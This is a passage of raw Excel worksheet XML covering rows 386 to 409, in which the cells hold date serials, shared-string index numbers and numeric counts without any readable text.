      <c r="B386" s="52">
        <v>44534.414179247688</v>
      </c>
      <c r="C386" s="95" t="s">
        <v>1434</v>
      </c>
      <c r="D386" s="96">
        <v>100</v>
      </c>
      <c r="E386" s="95" t="s">
        <v>1435</v>
      </c>
      <c r="F386" s="42">
        <v>100</v>
      </c>
      <c r="G386" s="95" t="s">
        <v>1436</v>
      </c>
      <c r="H386" t="s">
        <v>1437</v>
      </c>
      <c r="I386" t="s">
        <v>268</v>
      </c>
      <c r="J386" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K386" s="95" t="s">
        <v>12</v>
      </c>
      <c r="L386" t="s">
        <v>77</v>
      </c>
      <c r="M386" s="95" t="s">
        <v>622</v>
      </c>
      <c r="N386" t="s">
        <v>623</v>
      </c>
      <c r="Q386" s="95" t="s">
        <v>1438</v>
      </c>
      <c r="V386">
        <v>2</v>
      </c>
      <c r="W386" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="387" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A387" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B387" s="52">
        <v>44165.384758321758</v>
      </c>
      <c r="C387" s="95" t="s">
        <v>1439</v>
      </c>
      <c r="D387" s="96">
        <v>102</v>
      </c>
      <c r="E387" s="95" t="s">
        <v>1440</v>
      </c>
      <c r="F387" s="42">
        <v>102</v>
      </c>
      <c r="G387" s="95" t="s">
        <v>1441</v>
      </c>
      <c r="H387" t="s">
        <v>1442</v>
      </c>
      <c r="I387" t="s">
        <v>172</v>
      </c>
      <c r="J387" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K387" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L387" t="s">
        <v>83</v>
      </c>
      <c r="M387" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N387" t="s">
        <v>522</v>
      </c>
      <c r="O387" s="95" t="s">
        <v>1443</v>
      </c>
      <c r="P387" t="s">
        <v>738</v>
      </c>
      <c r="Q387" s="95" t="s">
        <v>1444</v>
      </c>
      <c r="R387">
        <v>45035</v>
      </c>
      <c r="S387">
        <v>40844</v>
      </c>
      <c r="T387">
        <v>43006</v>
      </c>
      <c r="U387">
        <v>213670</v>
      </c>
      <c r="V387">
        <v>575549</v>
      </c>
      <c r="W387" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="388" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A388" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B388" s="52">
        <v>44580.691867928239</v>
      </c>
      <c r="C388" s="95" t="s">
        <v>1445</v>
      </c>
      <c r="D388" s="96">
        <v>101</v>
      </c>
      <c r="E388" s="95" t="s">
        <v>1446</v>
      </c>
      <c r="F388" s="42">
        <v>101</v>
      </c>
      <c r="G388" s="95" t="s">
        <v>1447</v>
      </c>
      <c r="H388" t="s">
        <v>1448</v>
      </c>
      <c r="I388" t="s">
        <v>611</v>
      </c>
      <c r="J388" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K388" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L388" t="s">
        <v>77</v>
      </c>
      <c r="M388" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N388" t="s">
        <v>1098</v>
      </c>
      <c r="O388" s="95" t="s">
        <v>1449</v>
      </c>
      <c r="Q388" s="95" t="s">
        <v>1450</v>
      </c>
      <c r="R388">
        <v>234</v>
      </c>
      <c r="S388">
        <v>2780</v>
      </c>
      <c r="T388">
        <v>271</v>
      </c>
      <c r="U388">
        <v>1164</v>
      </c>
      <c r="V388">
        <v>867</v>
      </c>
      <c r="W388" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="389" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A389" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B389" s="52">
        <v>44342.648591805555</v>
      </c>
      <c r="C389" s="95" t="s">
        <v>1451</v>
      </c>
      <c r="D389" s="96">
        <v>103</v>
      </c>
      <c r="E389" s="95" t="s">
        <v>1452</v>
      </c>
      <c r="F389" s="42">
        <v>103</v>
      </c>
      <c r="G389" s="95" t="s">
        <v>1453</v>
      </c>
      <c r="H389" t="s">
        <v>1454</v>
      </c>
      <c r="I389" t="s">
        <v>172</v>
      </c>
      <c r="J389" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K389" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L389" t="s">
        <v>83</v>
      </c>
      <c r="M389" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N389" t="s">
        <v>522</v>
      </c>
      <c r="Q389" s="95" t="s">
        <v>1455</v>
      </c>
      <c r="R389">
        <v>9330</v>
      </c>
      <c r="S389">
        <v>16286</v>
      </c>
      <c r="T389">
        <v>18003</v>
      </c>
      <c r="U389">
        <v>22346</v>
      </c>
      <c r="V389">
        <v>52757</v>
      </c>
      <c r="W389" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="390" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A390" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B390" s="52">
        <v>44069.67221527778</v>
      </c>
      <c r="C390" s="95" t="s">
        <v>1451</v>
      </c>
      <c r="D390" s="96">
        <v>205</v>
      </c>
      <c r="E390" s="95" t="s">
        <v>1452</v>
      </c>
      <c r="F390" s="42">
        <v>205</v>
      </c>
      <c r="G390" s="95" t="s">
        <v>1453</v>
      </c>
      <c r="H390" t="s">
        <v>1454</v>
      </c>
      <c r="I390" t="s">
        <v>172</v>
      </c>
      <c r="J390" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K390" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L390" t="s">
        <v>83</v>
      </c>
      <c r="M390" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N390" t="s">
        <v>522</v>
      </c>
      <c r="O390" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q390" s="95" t="s">
        <v>1456</v>
      </c>
      <c r="R390">
        <v>9330</v>
      </c>
      <c r="S390">
        <v>16286</v>
      </c>
      <c r="T390">
        <v>18003</v>
      </c>
      <c r="U390">
        <v>22346</v>
      </c>
      <c r="V390">
        <v>52757</v>
      </c>
      <c r="W390" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="391" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A391" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B391" s="52">
        <v>44245.657708993058</v>
      </c>
      <c r="C391" s="95" t="s">
        <v>1457</v>
      </c>
      <c r="D391" s="96">
        <v>103</v>
      </c>
      <c r="E391" s="95" t="s">
        <v>1458</v>
      </c>
      <c r="F391" s="42">
        <v>101</v>
      </c>
      <c r="G391" s="95" t="s">
        <v>1459</v>
      </c>
      <c r="H391" t="s">
        <v>1460</v>
      </c>
      <c r="I391" t="s">
        <v>268</v>
      </c>
      <c r="J391" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K391" s="95" t="s">
        <v>40</v>
      </c>
      <c r="L391" t="s">
        <v>83</v>
      </c>
      <c r="N391" t="s">
        <v>1320</v>
      </c>
      <c r="O391" s="95" t="s">
        <v>1461</v>
      </c>
      <c r="Q391" s="95" t="s">
        <v>1462</v>
      </c>
      <c r="R391">
        <v>391</v>
      </c>
      <c r="S391">
        <v>114</v>
      </c>
      <c r="T391">
        <v>91</v>
      </c>
      <c r="U391">
        <v>1588</v>
      </c>
      <c r="V391">
        <v>1722</v>
      </c>
      <c r="W391" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="392" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A392" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B392" s="52">
        <v>44113.635730624999</v>
      </c>
      <c r="C392" s="95" t="s">
        <v>1463</v>
      </c>
      <c r="D392" s="96">
        <v>200</v>
      </c>
      <c r="E392" s="95" t="s">
        <v>1458</v>
      </c>
      <c r="F392" s="42">
        <v>200</v>
      </c>
      <c r="G392" s="95" t="s">
        <v>1459</v>
      </c>
      <c r="H392" t="s">
        <v>1460</v>
      </c>
      <c r="I392" t="s">
        <v>268</v>
      </c>
      <c r="J392" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K392" s="95" t="s">
        <v>40</v>
      </c>
      <c r="L392" t="s">
        <v>83</v>
      </c>
      <c r="N392" t="s">
        <v>1320</v>
      </c>
      <c r="O392" s="95" t="s">
        <v>1461</v>
      </c>
      <c r="Q392" s="95" t="s">
        <v>1464</v>
      </c>
      <c r="R392">
        <v>391</v>
      </c>
      <c r="S392">
        <v>114</v>
      </c>
      <c r="T392">
        <v>91</v>
      </c>
      <c r="U392">
        <v>1588</v>
      </c>
      <c r="V392">
        <v>1722</v>
      </c>
      <c r="W392" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="393" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A393" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B393" s="52">
        <v>44335.700018090276</v>
      </c>
      <c r="C393" s="95" t="s">
        <v>1465</v>
      </c>
      <c r="D393" s="96">
        <v>101</v>
      </c>
      <c r="E393" s="95" t="s">
        <v>1466</v>
      </c>
      <c r="F393" s="42">
        <v>101</v>
      </c>
      <c r="G393" s="95" t="s">
        <v>1467</v>
      </c>
      <c r="H393" t="s">
        <v>1468</v>
      </c>
      <c r="I393" t="s">
        <v>268</v>
      </c>
      <c r="J393" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K393" s="95" t="s">
        <v>12</v>
      </c>
      <c r="L393" t="s">
        <v>77</v>
      </c>
      <c r="M393" s="95" t="s">
        <v>622</v>
      </c>
      <c r="N393" t="s">
        <v>623</v>
      </c>
      <c r="Q393" s="95" t="s">
        <v>1469</v>
      </c>
      <c r="R393">
        <v>46259</v>
      </c>
      <c r="S393">
        <v>43849</v>
      </c>
      <c r="T393">
        <v>37500</v>
      </c>
      <c r="U393">
        <v>36910</v>
      </c>
      <c r="V393">
        <v>48779</v>
      </c>
      <c r="W393" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="394" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A394" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B394" s="52">
        <v>44172.692372048608</v>
      </c>
      <c r="C394" s="95" t="s">
        <v>1457</v>
      </c>
      <c r="D394" s="96">
        <v>103</v>
      </c>
      <c r="E394" s="95" t="s">
        <v>1466</v>
      </c>
      <c r="F394" s="42">
        <v>102</v>
      </c>
      <c r="G394" s="95" t="s">
        <v>1467</v>
      </c>
      <c r="H394" t="s">
        <v>1468</v>
      </c>
      <c r="I394" t="s">
        <v>268</v>
      </c>
      <c r="J394" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K394" s="95" t="s">
        <v>12</v>
      </c>
      <c r="L394" t="s">
        <v>77</v>
      </c>
      <c r="M394" s="95" t="s">
        <v>622</v>
      </c>
      <c r="N394" t="s">
        <v>623</v>
      </c>
      <c r="Q394" s="95" t="s">
        <v>1470</v>
      </c>
      <c r="R394">
        <v>46259</v>
      </c>
      <c r="S394">
        <v>43849</v>
      </c>
      <c r="T394">
        <v>37500</v>
      </c>
      <c r="U394">
        <v>36910</v>
      </c>
      <c r="V394">
        <v>48779</v>
      </c>
      <c r="W394" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="395" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A395" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B395" s="52">
        <v>44335.700018101852</v>
      </c>
      <c r="C395" s="95" t="s">
        <v>1465</v>
      </c>
      <c r="D395" s="96">
        <v>103</v>
      </c>
      <c r="E395" s="95" t="s">
        <v>1471</v>
      </c>
      <c r="F395" s="42">
        <v>103</v>
      </c>
      <c r="G395" s="95" t="s">
        <v>1472</v>
      </c>
      <c r="H395" t="s">
        <v>1473</v>
      </c>
      <c r="I395" t="s">
        <v>268</v>
      </c>
      <c r="J395" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K395" s="95" t="s">
        <v>12</v>
      </c>
      <c r="L395" t="s">
        <v>77</v>
      </c>
      <c r="M395" s="95" t="s">
        <v>622</v>
      </c>
      <c r="N395" t="s">
        <v>623</v>
      </c>
      <c r="Q395" s="95" t="s">
        <v>1470</v>
      </c>
      <c r="R395">
        <v>46404</v>
      </c>
      <c r="S395">
        <v>45021</v>
      </c>
      <c r="T395">
        <v>39019</v>
      </c>
      <c r="U395">
        <v>37089</v>
      </c>
      <c r="V395">
        <v>48918</v>
      </c>
      <c r="W395" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="396" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A396" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B396" s="52">
        <v>44314.65871935185</v>
      </c>
      <c r="C396" s="95" t="s">
        <v>1463</v>
      </c>
      <c r="D396" s="96">
        <v>103</v>
      </c>
      <c r="E396" s="95" t="s">
        <v>1474</v>
      </c>
      <c r="F396" s="42">
        <v>111</v>
      </c>
      <c r="G396" s="95" t="s">
        <v>1475</v>
      </c>
      <c r="H396" t="s">
        <v>1476</v>
      </c>
      <c r="I396" t="s">
        <v>268</v>
      </c>
      <c r="J396" s="95" t="s">
        <v>566</v>
      </c>
      <c r="K396" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L396" t="s">
        <v>77</v>
      </c>
      <c r="M396" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N396" t="s">
        <v>291</v>
      </c>
      <c r="O396" s="95" t="s">
        <v>1477</v>
      </c>
      <c r="P396" t="s">
        <v>567</v>
      </c>
      <c r="Q396" s="95" t="s">
        <v>1462</v>
      </c>
      <c r="R396">
        <v>4</v>
      </c>
      <c r="S396">
        <v>1036</v>
      </c>
      <c r="T396">
        <v>18729</v>
      </c>
      <c r="U396">
        <v>19696</v>
      </c>
      <c r="V396">
        <v>28966</v>
      </c>
      <c r="W396" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="397" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A397" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B397" s="52">
        <v>44085.746830324075</v>
      </c>
      <c r="C397" s="95" t="s">
        <v>1478</v>
      </c>
      <c r="D397" s="96">
        <v>101</v>
      </c>
      <c r="E397" s="95" t="s">
        <v>1479</v>
      </c>
      <c r="F397" s="42">
        <v>101</v>
      </c>
      <c r="G397" s="95" t="s">
        <v>1480</v>
      </c>
      <c r="H397" t="s">
        <v>1481</v>
      </c>
      <c r="I397" t="s">
        <v>268</v>
      </c>
      <c r="J397" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K397" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L397" t="s">
        <v>77</v>
      </c>
      <c r="M397" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N397" t="s">
        <v>291</v>
      </c>
      <c r="Q397" s="95" t="s">
        <v>1482</v>
      </c>
      <c r="R397">
        <v>460</v>
      </c>
      <c r="S397">
        <v>303</v>
      </c>
      <c r="T397">
        <v>292</v>
      </c>
      <c r="U397">
        <v>817</v>
      </c>
      <c r="V397">
        <v>636</v>
      </c>
      <c r="W397" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="398" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A398" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B398" s="52">
        <v>44489.987387673609</v>
      </c>
      <c r="C398" s="95" t="s">
        <v>1478</v>
      </c>
      <c r="D398" s="96">
        <v>205</v>
      </c>
      <c r="E398" s="95" t="s">
        <v>1479</v>
      </c>
      <c r="F398" s="42">
        <v>202</v>
      </c>
      <c r="G398" s="95" t="s">
        <v>1480</v>
      </c>
      <c r="H398" t="s">
        <v>1483</v>
      </c>
      <c r="I398" t="s">
        <v>268</v>
      </c>
      <c r="J398" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K398" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L398" t="s">
        <v>77</v>
      </c>
      <c r="M398" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N398" t="s">
        <v>291</v>
      </c>
      <c r="Q398" s="95" t="s">
        <v>1484</v>
      </c>
      <c r="R398">
        <v>460</v>
      </c>
      <c r="S398">
        <v>303</v>
      </c>
      <c r="T398">
        <v>292</v>
      </c>
      <c r="U398">
        <v>817</v>
      </c>
      <c r="V398">
        <v>636</v>
      </c>
      <c r="W398" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="399" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A399" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B399" s="52">
        <v>44489.987387673609</v>
      </c>
      <c r="C399" s="95" t="s">
        <v>1478</v>
      </c>
      <c r="D399" s="96">
        <v>300</v>
      </c>
      <c r="E399" s="95" t="s">
        <v>1479</v>
      </c>
      <c r="F399" s="42">
        <v>300</v>
      </c>
      <c r="G399" s="95" t="s">
        <v>1480</v>
      </c>
      <c r="H399" t="s">
        <v>1483</v>
      </c>
      <c r="I399" t="s">
        <v>268</v>
      </c>
      <c r="J399" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K399" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L399" t="s">
        <v>77</v>
      </c>
      <c r="M399" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N399" t="s">
        <v>291</v>
      </c>
      <c r="O399" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q399" s="95" t="s">
        <v>1485</v>
      </c>
      <c r="R399">
        <v>460</v>
      </c>
      <c r="S399">
        <v>303</v>
      </c>
      <c r="T399">
        <v>292</v>
      </c>
      <c r="U399">
        <v>817</v>
      </c>
      <c r="V399">
        <v>636</v>
      </c>
      <c r="W399" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="400" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A400" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B400" s="52">
        <v>44085.746830312499</v>
      </c>
      <c r="C400" s="95" t="s">
        <v>1478</v>
      </c>
      <c r="D400" s="96">
        <v>101</v>
      </c>
      <c r="E400" s="95" t="s">
        <v>1486</v>
      </c>
      <c r="F400" s="42">
        <v>101</v>
      </c>
      <c r="G400" s="95" t="s">
        <v>1487</v>
      </c>
      <c r="H400" t="s">
        <v>1488</v>
      </c>
      <c r="I400" t="s">
        <v>268</v>
      </c>
      <c r="J400" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K400" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L400" t="s">
        <v>77</v>
      </c>
      <c r="M400" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N400" t="s">
        <v>291</v>
      </c>
      <c r="Q400" s="95" t="s">
        <v>1482</v>
      </c>
      <c r="R400">
        <v>35557207</v>
      </c>
      <c r="S400">
        <v>30989380</v>
      </c>
      <c r="T400">
        <v>34232079</v>
      </c>
      <c r="U400">
        <v>29950100</v>
      </c>
      <c r="V400">
        <v>36910813</v>
      </c>
      <c r="W400" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="401" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A401" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B401" s="52">
        <v>44489.98738766204</v>
      </c>
      <c r="C401" s="95" t="s">
        <v>1478</v>
      </c>
      <c r="D401" s="96">
        <v>205</v>
      </c>
      <c r="E401" s="95" t="s">
        <v>1486</v>
      </c>
      <c r="F401" s="42">
        <v>205</v>
      </c>
      <c r="G401" s="95" t="s">
        <v>1487</v>
      </c>
      <c r="H401" t="s">
        <v>1488</v>
      </c>
      <c r="I401" t="s">
        <v>268</v>
      </c>
      <c r="J401" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K401" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L401" t="s">
        <v>77</v>
      </c>
      <c r="M401" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N401" t="s">
        <v>291</v>
      </c>
      <c r="Q401" s="95" t="s">
        <v>1484</v>
      </c>
      <c r="R401">
        <v>35557207</v>
      </c>
      <c r="S401">
        <v>30989380</v>
      </c>
      <c r="T401">
        <v>34232079</v>
      </c>
      <c r="U401">
        <v>29950100</v>
      </c>
      <c r="V401">
        <v>36910813</v>
      </c>
      <c r="W401" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="402" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A402" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B402" s="52">
        <v>44489.98738766204</v>
      </c>
      <c r="C402" s="95" t="s">
        <v>1478</v>
      </c>
      <c r="D402" s="96">
        <v>300</v>
      </c>
      <c r="E402" s="95" t="s">
        <v>1486</v>
      </c>
      <c r="F402" s="42">
        <v>300</v>
      </c>
      <c r="G402" s="95" t="s">
        <v>1487</v>
      </c>
      <c r="H402" t="s">
        <v>1488</v>
      </c>
      <c r="I402" t="s">
        <v>268</v>
      </c>
      <c r="J402" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K402" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L402" t="s">
        <v>77</v>
      </c>
      <c r="M402" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N402" t="s">
        <v>291</v>
      </c>
      <c r="O402" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q402" s="95" t="s">
        <v>1485</v>
      </c>
      <c r="R402">
        <v>35557207</v>
      </c>
      <c r="S402">
        <v>30989380</v>
      </c>
      <c r="T402">
        <v>34232079</v>
      </c>
      <c r="U402">
        <v>29950100</v>
      </c>
      <c r="V402">
        <v>36910813</v>
      </c>
      <c r="W402" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="403" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A403" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B403" s="52">
        <v>44033.617680509262</v>
      </c>
      <c r="C403" s="95" t="s">
        <v>1489</v>
      </c>
      <c r="D403" s="96">
        <v>110</v>
      </c>
      <c r="E403" s="95" t="s">
        <v>1490</v>
      </c>
      <c r="F403" s="42">
        <v>100</v>
      </c>
      <c r="G403" s="95" t="s">
        <v>1491</v>
      </c>
      <c r="H403" t="s">
        <v>1492</v>
      </c>
      <c r="I403" t="s">
        <v>31</v>
      </c>
      <c r="J403" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K403" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L403" t="s">
        <v>77</v>
      </c>
      <c r="M403" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N403" t="s">
        <v>263</v>
      </c>
      <c r="Q403" s="95" t="s">
        <v>1493</v>
      </c>
      <c r="U403">
        <v>2</v>
      </c>
      <c r="V403">
        <v>5</v>
      </c>
      <c r="W403" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="404" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A404" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B404" s="52">
        <v>44489.686027048614</v>
      </c>
      <c r="C404" s="95" t="s">
        <v>1494</v>
      </c>
      <c r="D404" s="96">
        <v>100</v>
      </c>
      <c r="E404" s="95" t="s">
        <v>1495</v>
      </c>
      <c r="F404" s="42">
        <v>100</v>
      </c>
      <c r="G404" s="95" t="s">
        <v>1496</v>
      </c>
      <c r="H404" t="s">
        <v>1497</v>
      </c>
      <c r="I404" t="s">
        <v>172</v>
      </c>
      <c r="J404" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K404" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L404" t="s">
        <v>83</v>
      </c>
      <c r="M404" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N404" t="s">
        <v>522</v>
      </c>
      <c r="Q404" s="95" t="s">
        <v>523</v>
      </c>
      <c r="R404">
        <v>24</v>
      </c>
      <c r="S404">
        <v>32</v>
      </c>
      <c r="T404">
        <v>27</v>
      </c>
      <c r="U404">
        <v>25</v>
      </c>
      <c r="V404">
        <v>89</v>
      </c>
      <c r="W404" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="405" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A405" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B405" s="52">
        <v>44250.62611203704</v>
      </c>
      <c r="C405" s="95" t="s">
        <v>1498</v>
      </c>
      <c r="D405" s="96">
        <v>100</v>
      </c>
      <c r="E405" s="95" t="s">
        <v>1499</v>
      </c>
      <c r="F405" s="42">
        <v>100</v>
      </c>
      <c r="G405" s="95" t="s">
        <v>1500</v>
      </c>
      <c r="H405" t="s">
        <v>1228</v>
      </c>
      <c r="I405" t="s">
        <v>103</v>
      </c>
      <c r="J405" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K405" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L405" t="s">
        <v>83</v>
      </c>
      <c r="M405" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N405" t="s">
        <v>149</v>
      </c>
      <c r="Q405" s="95" t="s">
        <v>1501</v>
      </c>
      <c r="R405">
        <v>3297</v>
      </c>
      <c r="S405">
        <v>4087</v>
      </c>
      <c r="T405">
        <v>3192</v>
      </c>
      <c r="U405">
        <v>3032</v>
      </c>
      <c r="V405">
        <v>4527</v>
      </c>
      <c r="W405" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="406" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A406" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B406" s="52">
        <v>44504.903723078707</v>
      </c>
      <c r="C406" s="95" t="s">
        <v>1502</v>
      </c>
      <c r="D406" s="96">
        <v>1115</v>
      </c>
      <c r="E406" s="95" t="s">
        <v>1503</v>
      </c>
      <c r="F406" s="42">
        <v>109</v>
      </c>
      <c r="G406" s="95" t="s">
        <v>1504</v>
      </c>
      <c r="H406" t="s">
        <v>1505</v>
      </c>
      <c r="I406" t="s">
        <v>156</v>
      </c>
      <c r="J406" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K406" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L406" t="s">
        <v>77</v>
      </c>
      <c r="M406" s="95" t="s">
        <v>509</v>
      </c>
      <c r="N406" t="s">
        <v>510</v>
      </c>
      <c r="O406" s="95" t="s">
        <v>1506</v>
      </c>
      <c r="Q406" s="95" t="s">
        <v>1507</v>
      </c>
      <c r="R406">
        <v>2979</v>
      </c>
      <c r="S406">
        <v>2784</v>
      </c>
      <c r="T406">
        <v>2427</v>
      </c>
      <c r="U406">
        <v>2131</v>
      </c>
      <c r="V406">
        <v>2366</v>
      </c>
      <c r="W406" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="407" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A407" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B407" s="52">
        <v>44524.712880925923</v>
      </c>
      <c r="C407" s="95" t="s">
        <v>1502</v>
      </c>
      <c r="D407" s="96">
        <v>1115</v>
      </c>
      <c r="E407" s="95" t="s">
        <v>1508</v>
      </c>
      <c r="F407" s="42">
        <v>118</v>
      </c>
      <c r="G407" s="95" t="s">
        <v>1509</v>
      </c>
      <c r="H407" t="s">
        <v>1510</v>
      </c>
      <c r="I407" t="s">
        <v>156</v>
      </c>
      <c r="J407" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K407" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L407" t="s">
        <v>77</v>
      </c>
      <c r="M407" s="95" t="s">
        <v>509</v>
      </c>
      <c r="N407" t="s">
        <v>510</v>
      </c>
      <c r="Q407" s="95" t="s">
        <v>1507</v>
      </c>
      <c r="R407">
        <v>2988425</v>
      </c>
      <c r="S407">
        <v>2847085</v>
      </c>
      <c r="T407">
        <v>2758550</v>
      </c>
      <c r="U407">
        <v>2702883</v>
      </c>
      <c r="V407">
        <v>3044197</v>
      </c>
      <c r="W407" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="408" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A408" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B408" s="52">
        <v>44406.751182349537</v>
      </c>
      <c r="C408" s="95" t="s">
        <v>1502</v>
      </c>
      <c r="D408" s="96">
        <v>1115</v>
      </c>
      <c r="E408" s="95" t="s">
        <v>1511</v>
      </c>
      <c r="F408" s="42">
        <v>109</v>
      </c>
      <c r="G408" s="95" t="s">
        <v>1512</v>
      </c>
      <c r="H408" t="s">
        <v>1513</v>
      </c>
      <c r="I408" t="s">
        <v>156</v>
      </c>
      <c r="J408" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K408" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L408" t="s">
        <v>77</v>
      </c>
      <c r="M408" s="95" t="s">
        <v>509</v>
      </c>
      <c r="N408" t="s">
        <v>510</v>
      </c>
      <c r="Q408" s="95" t="s">
        <v>1507</v>
      </c>
      <c r="R408">
        <v>110726</v>
      </c>
      <c r="S408">
        <v>123853</v>
      </c>
      <c r="T408">
        <v>102481</v>
      </c>
      <c r="U408">
        <v>115036</v>
      </c>
      <c r="V408">
        <v>122307</v>
      </c>
      <c r="W408" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="409" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A409" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B409" s="52">
        <v>44525.73112019676</v>
      </c>
      <c r="C409" s="95" t="s">
        <v>1502</v>
      </c>
      <c r="D409" s="96">
        <v>1115</v>
      </c>
      <c r="E409" s="95" t="s">
        <v>1514</v>
      </c>
      <c r="F409" s="42">
        <v>1012</v>
      </c>
      <c r="G409" s="95" t="s">
        <v>1515</v>
      </c>
      <c r="H409" t="s">
        <v>1516</v>
      </c>
      <c r="I409" t="s">
        <v>156</v>
      </c>
      <c r="J409" s="95" t="s">
        <v>438</v>
      </c>
      <c r="K409" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L409" t="s">
        <v>77</v>
      </c>
      <c r="M409" s="95" t="s">
        <v>509</v>
      </c>
      <c r="N409" t="s">
        <v>510</v>
